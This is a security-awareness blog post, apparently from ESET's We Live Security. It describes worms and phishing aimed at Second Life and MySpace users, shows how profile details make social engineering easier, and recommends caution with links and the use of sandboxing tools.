In recent months malware on social sites has been in the media. There was the “Greygoo” worm that affected Second Life (http://secondlife.com/), as well as worms attacking MySpace (http://www.myspace.com) users. A recent worm that used QuickTime to spread to MySpace users also incorporated a Phishing attack. Users who accessed infected pages were sent to a web page that asked for them to sign in to MySpace. If the user entered their name and password it did not log them in, it stole the information.
Community sites are going to continue to flourish so it is important for users to be aware of the risks they face and tactics for protection.
There are the standard security precautions that apply to all computer and internet use, but for users of community or social web sites you need to be aware of the social engineering aspects. Social engineering simply means tricking you into doing something.
The biggest danger of these sites is that people tend to drop their guard. There are millions of friendly folks sharing all kinds of information and people tend to trust that when someone befriends them and tells them about something cool it is just good old fashioned neighborly friendship. There are unfortunately going to be several not so nice people in most any gathering of thousands or millions of people.
The fact that people tend to put up a lot of personal information makes it extremely easy to use social engineering.
Here is an example. I did a search and randomly picked a user. I found out that she is married to a soldier, has a child, is obsessive compulsive, religious, loves to read, likes teaching, and writes children’s books among other things. Armed with this information it is very easy to convince a person that I am very religious, concerned for the safety of all of our soldiers and find solace in “www.i’m very mean.com”. Now of course it would look like a real nice web site to go to. Once there I can execute code on her computer that exploits a zero day vulnerability, or even convince her to run a program that will “display a quote a day from the bible”. I could probably convince her to sign up for a military support friendship group, etc. Knowing the nature of how people use passwords, it is pretty likely that the password entered is not unique to my “community” and I can then go about hacking into other accounts. There are lots of ways to attack.
If I don’t know anything about a person and tell them to check something out, they might be more cautious because they don’t know me and I do not appear to know anything about them.
If you use community sites, I’m not saying not to make friends, but take your time before you accept links to other web sites, or are convinced to download or sign up for anything. The bad guys don’t want to spend hours getting to know you Ã¢â‚¬â€œ there are easier targets.
When I went to this specific web page it automatically launched a video! I’m sure glad I run Firefox and IE in SandBoxIE (www.sandboxie.com). If the video exploited a vulnerability I could have had become infected with all kinds of bad programs that could steal my passwords or other information on my computer.
Virtualization technologies, such as SandBoxIE are a great compliment to Anti-virus solutions. Neither stop everything, but virtualization can protect sensitive data, and if something bad was installed it will be gone when I empty the sandbox.
Surf safe. Remember, the community web sites are a masquerade party. You do not really know who’s behind the mask and their intent.
Author ESET Research, We Live Security